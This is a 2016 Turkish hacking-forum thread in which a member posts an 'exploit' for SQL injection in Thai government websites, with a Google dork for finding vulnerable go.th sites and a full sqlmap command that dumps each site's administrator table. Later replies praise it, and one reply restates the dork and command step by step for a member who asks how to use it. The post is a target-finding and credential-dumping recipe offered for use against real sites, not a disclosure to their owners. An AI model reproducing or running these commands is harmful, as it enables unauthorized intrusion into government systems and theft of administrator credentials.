Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Turkhackteam Under Ground
> Exploitler > Bug Researchers

Bug Researchers Yeni bulunan açıklar.


Tayland Devlet Siteleri SQLi Açığı [Bug Researchers]

Bug Researchers

Yeni Konu aç Cevapla
 
Seçenekler
Alt 05-03-2016   #1
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Feb 2012
Yaş
15
Mesajlar
Konular


  
Tayland Devlet Siteleri SQLi Açığı [Bug Researchers]



[Tayland Devlet Siteleri SQLi Zaafiyeti]
[05/03/2016]
[Bug Researchers]
[by MrCnky]


Kod:
'''
* Exploit Başlığı: Tayland Devlet Siteleri SQLi Zaafiyeti
* Google Dork:  site:go.th inurl:data.php?id=[VAL]
* Exploit Yazarı: MrCnky 
* İletişim Adresi: https://twitter.com/Par4d0x1D           
* Raporlanmış Versiyonlar: Hepsi   
* Keşif Tarihi: 05/03/2016
* Kategori: Web Aplikasyonları


Açıklama
------------
Birçok Tayland devlet sitesinde yer alan bu bug
saldırgan şahsın SQL enjeksiyonu atağını otomatik
olarak uygulamasına ve ekrana yönetici bilgilerinin
yazdırılmasına imkan sağlamaktadır.

Proof of Concepts (PoC)
---------------------------------
Saldırganın, Google arama motoru üzerinden arayacağı
dork ile çıkan sitelerin Sqlmap adlı araç yardımı ile
exploitlenmesi aşağıda anlatılmıştır.

[VAL] = Integer Değişken. Örn: 1, 2, 5...
[DOM] = www.test.go.th -> test

Google Dork: site:go.th inurl:data.php?id=[VAL] 
SQLMap Komutu: python sqlmap.py -u "www.site.go.th/data.php?id=[VAL]"
--batch --random-agent -D [DOM]_db -T tb_administor --dump

Son Olarak
---------------
Bu bug, MrCnky tarafından, zarar verme amacı gütmeden 
keşfedilmiştir. Bug sonucunda oluşabilecek herhangi
bir zarardan dolayı sorumlu tutulamam.
'''
    

Konu Par4d0x1D tarafından (05-03-2016 Saat 22:03 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 05-03-2016   #2
  • Offline
  • Yarbay
  • Genel Bilgiler
Üyelik tarihi
Apr 2015
Nereden
fl3xpl0it
Yaş
17
Mesajlar
Konular


  

Yararlı konu eline sağlık.
Dorku bir yerden mi aldın yoksa?
    


__________________

Eğer Karadeniz'den geçerseniz, Trabzon'da durun
Dinle İskoçya'nın gaydasını kıskandırır ''tulum''
Offline
 
Alıntı ile Cevapla
Alt 05-03-2016   #3
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Jun 2015
Nereden
tak.php
Mesajlar
Konular


  

Ellerine Sağlık
    
Offline
 
Alıntı ile Cevapla
Alt 05-03-2016   #4
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Mar 2016
Mesajlar
Konular
0


  

hmm iyiymiş
    
Offline
 
Alıntı ile Cevapla
Alt 05-03-2016   #5
  • Offline
  • Tümgeneral | Y.M. Ekibi
  • Genel Bilgiler
Üyelik tarihi
Feb 2012
Yaş
20
Mesajlar
Konular


  

Eline sağlık. Başarılar. Çalınmadan kaydettirmeyi unutma
    
Offline
 
Alıntı ile Cevapla
Alt 05-03-2016   #6
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Mar 2016
Mesajlar
1
Konular
0


  

Hemen Dalıyorum
    
Offline
 
Alıntı ile Cevapla
Alt 01-04-2016   #7
  • Offline
  • Forumdan Uzaklaştırıldı
  • Genel Bilgiler
Üyelik tarihi
Dec 2015
Mesajlar
Konular


  

Ellerine saglik yetenekli kardesim benim
    
Offline
 
Alıntı ile Cevapla
Alt 25-04-2016   #8
  • Offline
  • Asteğmen
  • Genel Bilgiler
Üyelik tarihi
Apr 2016
Mesajlar
Konular
7


  

ben anlamadım ya biri bana düz şekıilde anlatabıilir mi google ne diye aratıcaz
    
Offline
 
Alıntı ile Cevapla
Alt 18-06-2016   #9
  • Offline
  • Üsteğmen
  • Genel Bilgiler
Üyelik tarihi
Jan 2011
Nereden
Bursa
Mesajlar
Konular


  

site:go.th inurl:data.php?id=[VAL] Bunu google'da ara.


python sqlmap.py -u "www.site.go.th/data.php?id=[VAL]" --batch --random-agent -D [DOM]_db -T tb_administor --dump Bunuda bulduğun sitelere göre düzenleyip sqlmapta caliştir.
    


__________________

Hacking Interface
Bilişimin Yeraltı Dünyasından__


Konu ayberk2 tarafından (18-06-2016 Saat 14:56 ) değiştirilmiştir..
Offline
 
Alıntı ile Cevapla
Alt 18-06-2016   #10
  • Offline
  • Binbaşı
  • Genel Bilgiler
Üyelik tarihi
Feb 2016
Mesajlar
Konular


  

Ellerine sağlık dostum
    
Offline
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz, bu sitelerin güvenlik açıklarını site sahibine bildirmek için çaba sarfeder.
Turkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Turkhackteam sorumlu değildir. Sitelerinize Turkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.




Powered by vBulletin® Copyright ©2000 - 2017

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google Links

Referandum 2017



Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.